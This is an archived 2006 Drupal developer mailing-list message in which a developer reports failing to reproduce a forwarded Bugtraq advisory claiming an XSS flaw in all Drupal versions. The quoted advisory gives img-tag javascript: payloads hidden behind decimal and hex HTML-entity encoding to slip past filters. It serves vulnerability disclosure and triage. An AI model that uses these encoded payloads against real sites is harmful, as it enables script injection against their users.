[development] [liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]

Darrel O'Pry dopry at thing.net
Wed Jan 4 18:37:24 UTC 2006 

I tried to reproduce this, but was unable to... anyone else have any
luck?

On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:
> This is from bugtraq...
> 
> email message attachment
> > -------- Forwarded Message --------
> > From: liz0 at bsdmail.com
> > To: bugtraq at securityfocus.com
> > Subject: Drupal all versiyon xss cehennem.org
> > Date: 2 Jan 2006 10:45:25 -0000
> > 
> > Drupal all versiyon xss 
> > ----------------------------------------------------
> > site:http://www.drupal.org
> > 
> > Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
> > --------------------------------------------------
> > 
> > img tag : on
> > 
> > ---------------------------------------------------------------------------------------------------------------------------------------------------------------------
> > 
> > Decimal Value: HTML (without semicolons) 
> > 
> > <img src=javascript:alert('XSS')>  = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
> > ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> > Decimal Value: HTML (with semicolons)
> > 
> > <img src=javascript:alert('XSS')>  = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
> > 
> > 
> > ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> > example:
> > post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable 
> > 
> > post mesage  :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable  
> > 
> >   
> > ---------------------------------------------------------
> > 
> > Credit:Liz0ziM
> > mail:liz0 at bsdmail.com
> > www.biyo.tk , www.cehennem.org
> > 
> > Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
> > 
> > -----------------------------------------------------------
> > Source:
> > 
> > http://liz0zim.no-ip.org/drupal.txt
> > 
> > ------------------------------------------------------------
> > 
> >

More information about the development mailing list